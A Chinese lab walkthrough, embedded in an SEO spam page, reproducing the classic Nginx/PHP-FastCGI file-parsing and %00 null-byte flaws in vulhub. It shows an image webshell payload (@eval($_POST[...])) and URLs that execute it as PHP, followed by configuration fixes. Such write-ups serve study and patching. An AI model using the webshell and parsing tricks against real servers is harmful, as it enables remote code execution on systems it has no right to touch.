当前位置: 首页 > news >正文

大兴网站建设设计公司网站模板之家官网

大兴网站建设设计公司,网站模板之家官网,武汉专业做网站,杭州营销一、漏洞说明 Nginx文件解析漏洞算是一个比较经典的漏洞&#xff0c;接下来我们就通过如下步骤进行漏洞复现&#xff0c;以及进行漏洞的修复。 版本条件&#xff1a;IIS 7.0/IIS 7.5/ Nginx <8.03 二、搭建环境 cd /vulhub/nginx/nginx_parsing_vulnerability docker-compos…

一、漏洞说明
Nginx文件解析漏洞算是一个比较经典的漏洞,接下来我们就通过如下步骤进行漏洞复现,以及进行漏洞的修复。
版本条件:IIS 7.0/IIS 7.5/ Nginx <8.03
二、搭建环境
cd /vulhub/nginx/nginx_parsing_vulnerability
docker-compose up -d
在这里插入图片描述在这里插入图片描述

三、漏洞特征
访问:http://192.168.25.128/uploadfiles/nginx.png
在这里插入图片描述

然后我们输入/.php,可以发现并没有出现文件为找到,而是出现了php的配置信息
在这里插入图片描述

四、漏洞复现
使用界面的上传功能上传一个jpg图片马,jpg内容是@eval($_POST[“fname”]);
在这里插入图片描述

点击上传后
在这里插入图片描述

然后访问:
http://192.168.25.128/uploadfiles/b82ae21729b331095eb02a213284320d.jpg/.php
在这里插入图片描述

五、修复建议
1.php.ini配置文件中的cgi.fix_pathinfo=1设置为0
2.security.limit_extensions=./php
六、Nginx <8.03 空字节代码执行漏洞
影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
当使用PHP-FastCGI执行PHP时,遇到url里面存在%00空字节时与FastCGI的处理不一致,导致可在非PHP文件中嵌入PHP代码,通过访问url+%00.PHP来执行其中的PHP代码。
例如:"http://127.0.0.1/1.jpg%00.php"会把1.jpg文件(木马文件)当做PHP文件来执行。xxx.jpg%00.php

http://www.hrbkazy.com/news/28496.html

相关文章:

  • 一站式免费建站平台网站推广策划书
  • 东阳营销型网站建设品牌app推广活动策划方案
  • 宁波网站建设主页宁波网站建设与维护
  • collectfrom企业网站模版南京seo排名扣费
  • 兰州网站排名公司百度的首页
  • 上海市建设安全协会网站打不开扫描图片找原图
  • 网站编辑超链接怎么做企业seo排名
  • 修改wordpress入口地址厦门seo结算
  • wordpress 无法加载cssseo排名优化首页
  • 做建材哪个网站平台好网站优化培训
  • 石家庄站列车时刻表二十条疫情优化措施
  • 微网站访问量seo是广告投放吗
  • 网站建设详细流磁力狗
  • 洞口做网站的公司百度关键词热度
  • 桂林出网站正规网站优化推广
  • 网站开发需要哪些工程师抖音seo排名系统
  • 建设企业网站的人员组成千峰培训多少钱
  • 高端网站制作免费开源网站
  • 网站建设基本流程详细说明搜索引擎seo关键词优化方法
  • 济源做网站怎么收费品牌营销是什么
  • 商城网站制作 价格个人引流推广怎么做
  • 罗湖企业网站建设做网站的软件叫什么
  • 看网站不受限制的浏览器有哪些app开发费用一般多少钱
  • 如何做垂直网站济南网络优化网站
  • 展览公司网站建设方案企业网站排名优化价格
  • 掉关键词网站抖音关键词排名查询
  • 免费创建音乐网站今日最新新闻摘抄
  • 恩施网站建设网站建设的方法有哪些
  • 乌鲁木齐市网站制作公司seo1视频发布会
  • 辽宁省电力建设网站百度网站推广费用